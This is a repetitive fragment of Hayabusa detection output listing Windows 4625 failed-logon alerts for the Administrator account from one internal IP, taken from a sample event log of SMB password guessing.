+2016-09-19 16:50:13.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.759 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.834 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.895 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.159 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.189 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.345 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.427 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.503 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:14.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.211 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.554 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.595 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.644 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.807 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:15.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.059 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.133 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.427 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.459 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.507 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.623 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.783 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.827 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: 